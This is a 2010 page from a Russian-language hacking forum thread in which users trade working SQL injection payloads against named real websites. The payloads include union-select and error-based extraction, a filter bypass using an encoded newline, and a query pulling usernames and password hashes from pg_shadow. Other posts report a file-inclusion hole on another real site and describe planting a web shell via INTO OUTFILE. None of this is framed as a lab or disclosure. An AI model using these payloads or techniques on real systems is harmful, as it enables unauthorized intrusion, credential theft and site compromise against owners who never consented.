FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1446 из 2422

1446

Опции темы

Поиск в этой теме

Опции просмотра

17.08.2010, 16:19

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Отправить сообщение для ZARO с помощью ICQ

Цитата:

Сообщение от a1ertso

a1ertso said:
ZARO, спасибо. А можете объяснить, почему вывод осуществляется только при соединении строк?

Почему? Не обязательно соединять строки - http://www.music-master.ru/?action=show_list&cat=-11069+'+union+select+'vot%20vivod'+--+

Ты просто забыл отсечь вывод с первого запроса, достаточно было поставить минус перед cat=

17.08.2010, 16:22

a1ertso

Новичок

Регистрация: 16.12.2009

Сообщений: 29

Провел на форуме:
101927

Репутация: 0

ZARO, еще раз спасибо =)

И снова проблема

Цитата:

Сообщение от None

http://www.music-master.ru/?action=show_list&cat=-11069+%27+union+select+concat_ws%28table_name%20in formation_schema.tables%29+--+

Запрос небезопасен и был отвергнут.

Как это обойти?

17.08.2010, 16:48

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Цитата:

Сообщение от a1ertso

a1ertso said:
ZARO, еще раз спасибо =)
И снова проблема
Запрос небезопасен и был отвергнут.
Как это обойти?

Можно так выводить :

Код:

Code:
http://www.music-master.ru/?action=show_list&cat=11069+'+and(select+1+from(select+count(*),concat(concat_ws(0x3a,column_name),floor(rand(0)*2))x+from+information_Schema.columns+group+by+x)a)+--+

17.08.2010, 17:09

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Отправить сообщение для kamaz с помощью ICQ

Можно, конечно, и так, но обойти - это же гораздо интереснее

1) Методом научного тыка определяем, что блочится последовательность

Код:

Code:
...union...select...from...

2) Из блока последовательности следует, что все три слова должны находиться в одной строке)

3) Пытаемся сделать так, чтобы одна строка стала двумя, вводя энтер (%0A )

Код:

Code:
http://www.music-master.ru/?action=show_list&cat=-1'+union %0A select+table_name from information_schema.tables/*

И все работает ^_^

17.08.2010, 23:02

wkar

Познающий

Регистрация: 18.10.2009

Сообщений: 80

Провел на форуме:
1180165

Репутация: 11

есть LFI

_http://www.alma-nah.com/soiskatelinew.php?a=[LFI]

нуллбайт не отсекает .html , есть ли альтернатива?

ПС

Подкиньте хорошей манны.

17.08.2010, 23:15

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

Цитата:

Сообщение от wkar

wkar said:
есть LFI
_http://www.alma-nah.com/soiskatelinew.php?a=[LFI]
нуллбайт не отсекает .html , есть ли альтернатива?
ПС
Подкиньте хорошей манны.

/thread98525.html

18.08.2010, 00:46

InfectedM

Познающий

Регистрация: 04.11.2007

Сообщений: 51

Провел на форуме:
310791

Репутация: 6

Отправить сообщение для InfectedM с помощью ICQ

ругается на тип и фильтрует кавычки

http://ethnography.omskreg.ru/page.php?id=-1+Union+select+1,2,3,4,5,6,7,8,9,10--+

Можно что-нибудь сделать в данном случае?

подскажите плз

18.08.2010, 00:54

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от InfectedM

InfectedM said:
ругается на тип и фильтрует кавычки
http://ethnography.omskreg.ru/page.php?id=-1+Union+select+1,2,3,4,5,6,7,8,9,10--+
Можно что-нибудь сделать в данном случае?
подскажите плз

http://ethnography.omskreg.ru/page.php?id=-1+Union+select+version()::int,null,null,null,null, null,null,null,null,null--+

http://ethnography.omskreg.ru/page.php?id=-1+Union+select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null,null,null+ from+pg_shadow--+

18.08.2010, 01:13

kfor

Участник форума

Регистрация: 01.09.2005

Сообщений: 194

Провел на форуме:
818095

Репутация: 34

Отправить сообщение для kfor с помощью ICQ

Цитата:

Сообщение от InfectedM

http://ethnography.omskreg.ru//inc/db.inc

#10

18.08.2010, 05:04

Gedj

Познающий

Регистрация: 15.09.2008

Сообщений: 54

Провел на форуме:
612815

Репутация: 46

Заливаю шелл через sql и пишу +union+select+''+from+mysql.user+into+outfile+ту т путь

Фаил успешно заливается но при заходе на него пшет: Cannot execute a blank command in и путь

То есть при 232.php?cmd=phpinfo() просто выводиться пустая страница.

Что не так делаю?)

Страница 1446 из 2422

1446

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход

ANTICHAT.XYZ